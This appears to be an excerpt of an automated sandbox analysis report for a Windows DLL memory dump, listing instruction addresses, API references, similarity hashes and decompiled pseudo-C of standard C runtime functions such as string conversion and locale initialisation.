0x6de2624c
0x6de2624c
0x6de2624a
0x6de2624e
0x6de26253
0x6de2625a
0x6de2625d
0x6de2625d
0x6de26279
0x6de2627f
0x6de26284
0x6de26417
0x6de2641b
0x6de2642a
0x6de2628a
0x6de2628a
0x6de2628d
0x6de26292
0x6de26296
0x6de262ea
0x6de262ea
0x6de262ec
0x6de262ee
0x6de2640c
0x6de2640c
0x6de2640e
0x6de2640f
0x00000000
0x6de26415
0x6de262ff
0x6de26305
0x6de26307
0x00000000
0x00000000
0x6de2630d
0x6de2631f
0x6de26324
0x6de26328
0x00000000
0x00000000
0x6de26335
0x6de2636f
0x6de26372
0x6de26375
0x6de26377
0x6de26379
0x6de2637b
0x6de263c7
0x6de263c7
0x6de263c9
0x6de263c9
0x6de263cb
0x6de26405
0x6de26406
0x00000000
0x6de2640b
0x6de263df
0x6de263e4
0x6de263e6
0x00000000
0x00000000
0x6de263ea
0x6de263eb
0x6de263ec
0x6de263ef
0x6de2642b
0x6de2642e
0x6de263f1
0x6de263f1
0x6de263f2
0x6de263f2
0x6de263ff
0x6de26401
0x6de26403
0x6de26434
0x00000000
0x00000000
0x00000000
0x00000000
0x6de26403
0x6de2637d
0x6de26380
0x6de26382
0x6de26384
0x6de26386
0x6de26389
0x6de2638e
0x6de263a9
0x6de263ab
0x6de263b5
0x6de263b7
0x6de263b8
0x6de263ba
0x00000000
0x00000000
0x6de263bc
0x6de263c2
0x6de263c2
0x00000000
0x6de263c2
0x6de26390
0x6de26392
0x6de26396
0x6de2639b
0x6de2639d
0x6de2639f
0x00000000
0x00000000
0x6de263a1
0x00000000
0x6de263a1
0x6de26337
0x6de2633c
0x00000000
0x00000000
0x6de26342
0x6de26344
0x00000000
0x00000000
0x6de2635b
0x6de26360
0x6de26364
0x00000000
0x00000000
0x00000000
0x6de2636a
0x6de2629d
0x6de2629f
0x6de262a1
0x6de262a9
0x6de262c8
0x6de262ca
0x6de262d4
0x6de262d6
0x6de262d7
0x6de262d9
0x00000000
0x00000000
0x6de262df
0x6de262e5
0x6de262e5
0x00000000
0x6de262e5
0x6de262ad
0x6de262b1
0x6de262b6
0x6de262ba
0x00000000
0x00000000
0x6de262c0
0x00000000
0x6de262c0

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6DE0F290,6DE0F290,?,?,?,6DE26470,00000001,00000001,C5E85006), ref: 6DE26279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6DE26470,00000001,00000001,C5E85006,?,?,?), ref: 6DE262FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6DE263F9
__freea.LIBCMT ref: 6DE26406

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

__freea.LIBCMT ref: 6DE2640F
__freea.LIBCMT ref: 6DE26434

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2bb4d64726ef76ed9cfc920b627db4eb28f05a6aaf240cc538a2c49c35b86be4
Instruction ID: a48f696055bdb0d6cf257d5a19897a6c62e2f6985eaa3b743e5ba3b883be2494
Opcode Fuzzy Hash: 2bb4d64726ef76ed9cfc920b627db4eb28f05a6aaf240cc538a2c49c35b86be4
Instruction Fuzzy Hash: E051AE72610216ABEF198F64CC40FBB37A9EB84758B22432DFD54E6240DF74DC5586E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE123DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6DE123DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6DE24E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6DE1C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6DE1CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6DE24E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6DE1E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6DE12188();
							asm("int3");
							E6DDF0990(_t97, _t123, 0x6de92bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6DE123DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6DE1D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6DE250ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6DE1F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6DE250ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6DE12361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6DE1CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6de952ec & 0x00000001;
												if(( *0x6de952ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6DE1CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6DE125CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6DE1CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6DE12188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6DDF09D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6DE1E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

0x6de123dd
0x6de123dd
0x6de123e2
0x6de123e7
0x6de123f7
0x6de123f8
0x6de12401
0x6de12409
0x6de1240e
0x6de12411
0x6de12413
0x6de1241f
0x6de12429
0x6de1242c
0x6de1242d
0x6de1242f
0x6de12460
0x6de12461
0x6de12467
0x00000000
0x6de12431
0x6de1243b
0x6de12440
0x6de12443
0x6de12445
0x6de1245e
0x00000000
0x6de12447
0x6de12447
0x6de1244a
0x00000000
0x6de1244c
0x6de1244c
0x6de1244f
0x00000000
0x6de12451
0x00000000
0x6de12451
0x6de1244f
0x6de1244a
0x6de12445
0x6de12415
0x6de12415
0x6de12418
0x6de1246f
0x6de1246f
0x6de12470
0x6de12471
0x6de12472
0x6de12474
0x6de12479
0x6de12481
0x6de12489
0x6de1248d
0x6de12493
0x6de12494
0x6de12496
0x6de12498
0x6de124a1
0x6de124a6
0x6de124ac
0x6de124af
0x6de124b2
0x6de124b7
0x6de124c6
0x6de124cb
0x6de124ce
0x6de124d0
0x6de124ea
0x6de124f7
0x6de124f9
0x6de124fb
0x00000000
0x6de124fd
0x6de124fd
0x6de12500
0x6de12503
0x6de1250e
0x6de12511
0x6de12516
0x6de12519
0x6de1251b
0x6de1253e
0x6de1253e
0x6de12543
0x6de12548
0x6de12549
0x6de1254d
0x6de12553
0x6de12556
0x6de12558
0x6de1255c
0x6de12560
0x6de12566
0x6de1256b
0x6de1256c
0x6de12571
0x6de12571
0x6de12571
0x6de12560
0x6de12574
0x6de12577
0x6de1257e
0x6de12580
0x6de12587
0x6de1258d
0x6de1258f
0x6de12591
0x6de12595
0x6de12596
0x6de1259c
0x6de125a2
0x6de125a2
0x6de125a2
0x6de125a2
0x6de12596
0x6de1258f
0x6de12587
0x6de125aa
0x6de125ac
0x6de125b3
0x6de125b7
0x6de125be
0x6de1251d
0x6de1251d
0x6de12520
0x6de12527
0x6de12527
0x6de12528
0x6de12529
0x6de1252a
0x6de1252b
0x00000000
0x6de12522
0x6de12522
0x6de12525
0x6de1252e
0x6de12530
0x00000000
0x6de12532
0x6de12533
0x00000000
0x6de12538
0x00000000
0x00000000
0x00000000
0x6de12525
0x6de12520
0x6de1251b
0x6de124d2
0x6de124d2
0x6de124d5
0x6de124dc
0x6de124dc
0x6de124dd
0x6de124de
0x6de124df
0x6de124e0
0x6de124e1
0x6de124e1
0x6de124d7
0x6de124d7
0x6de124da
0x00000000
0x00000000
0x6de124da
0x6de124e6
0x6de124e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6de124e8
0x6de1249a
0x6de1249a
0x6de1249a
0x6de125ca
0x6de1241a
0x6de1241a
0x6de1241d
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1241d
0x6de12418
0x6de123e9
0x6de123ee
0x6de1246b
0x6de1246e
0x6de1246e

APIs

__cftoe.LIBCMT ref: 6DE12409
__cftoe.LIBCMT ref: 6DE1243B

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 836bf2091febe596ea99bbb36543dd15a9847e9df114c3d62b74c8007e5fb228
Instruction ID: 8fc80163693dfb611218e986595563544f780d20dd0390df58bce2ae88121cbc
Opcode Fuzzy Hash: 836bf2091febe596ea99bbb36543dd15a9847e9df114c3d62b74c8007e5fb228
Instruction Fuzzy Hash: 5651EA32B0C216ABDB258B688C42EBE77B9AF5B32CF71411DE925F6281DF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF42C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DDF42C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6de95090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6DDF56A9(__eflags,  *0x6de95090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6DDF56E4(__eflags,  *0x6de95090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6DDFB9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6DDF56E4(__eflags,  *0x6de95090, 0);
								} else {
									__eflags = E6DDF56E4(__eflags,  *0x6de95090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6DE11DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ddf42cf
0x6ddf42e2
0x6ddf42e9
0x6ddf42ec
0x6ddf42ef
0x6ddf4308
0x6ddf4308
0x6ddf42f1
0x6ddf42f1
0x6ddf42f3
0x6ddf42fd
0x6ddf4303
0x6ddf4304
0x6ddf4306
0x6ddf430d
0x6ddf430f
0x6ddf4316
0x6ddf431a
0x6ddf431c
0x6ddf4330
0x6ddf4330
0x6ddf4339
0x6ddf431e
0x6ddf432c
0x6ddf432e
0x6ddf4342
0x6ddf4344
0x6ddf4344
0x00000000
0x00000000
0x00000000
0x6ddf432e
0x6ddf4347
0x00000000
0x00000000
0x00000000
0x6ddf4306
0x6ddf42f3
0x6ddf434f
0x6ddf4359
0x6ddf42d1
0x6ddf42d3
0x6ddf42d3

APIs

GetLastError.KERNEL32(00000001,?,6DDF3EDB,6DDEFA25,6DDEFD54,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E), ref: 6DDF42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DDF42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DDF42FD
SetLastError.KERNEL32(00000000,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDF434F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aadb461361cbf1a5040739f50048c8441f70093d6001019337044a11aa509798
Instruction ID: 0a0898ca8aaf7780835daf699c228aa51d5735cdf4f2104252a4fc61a2e5fdd9
Opcode Fuzzy Hash: aadb461361cbf1a5040739f50048c8441f70093d6001019337044a11aa509798
Instruction Fuzzy Hash: E601D43224E726DFEA1437B4ADA5B7626F5EB0777A723022BF224490E4EF1148139194

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t286 - 0x14, 0);
				_t273 =  *0x6de96ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6DDB161C(0x6de96d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6DDD66BA(_t286 - 0x14);
					return E6DDF0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6DDE1409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t286 - 0x20);
							E6DDF3D74(_t286 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t266, _t273, 0x14);
							E6DDD6653(_t286 - 0x14, 0);
							_t274 =  *0x6de96de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6DDB161C(0x6de96d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6DDD66BA(_t286 - 0x14);
								return E6DDF0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6DDE1471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t286 - 0x20);
										E6DDF3D74(_t286 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t203, _t267, _t274, 0x14);
										E6DDD6653(_t286 - 0x14, 0);
										_t275 =  *0x6de96dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6DDB161C(0x6de96da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6DDD66BA(_t286 - 0x14);
											return E6DDF0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6DDE14EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t286 - 0x20);
													E6DDF3D74(_t286 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t203, _t268, _t275, 0x14);
													E6DDD6653(_t286 - 0x14, 0);
													_t276 =  *0x6de96dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6DDB161C(0x6de96d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6DDD66BA(_t286 - 0x14);
														return E6DDF0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6DDE1558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t286 - 0x20);
																E6DDF3D74(_t286 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t203, _t269, _t276, 0x14);
																E6DDD6653(_t286 - 0x14, 0);
																_t277 =  *0x6de96e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6DDB161C(0x6de96dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6DDD66BA(_t286 - 0x14);
																	return E6DDF0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6DDE15C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t286 - 0x20);
																			E6DDF3D74(_t286 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t203, _t270, _t277, 0x14);
																			E6DDD6653(_t286 - 0x14, 0);
																			_t278 =  *0x6de96dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6DDB161C(0x6de96d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6DDD66BA(_t286 - 0x14);
																				return E6DDF0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6DDE162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6DDB1438(_t245);
																						E6DDF3D74(_t286 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de3851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6de3c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6DDE542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6DDF0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6DDD6FD3(__eflags, _t271);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6de96dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6DDD6FD3(__eflags, _t270);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6de96e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6DDD6FD3(__eflags, _t269);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6de96dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6DDD6FD3(__eflags, _t268);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6de96dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6DDD6FD3(__eflags, _t267);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6de96de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6DDD6FD3(__eflags, _t266);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6de96ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6dddf94b
0x6dddf94b
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf97c
0x6dddf981
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
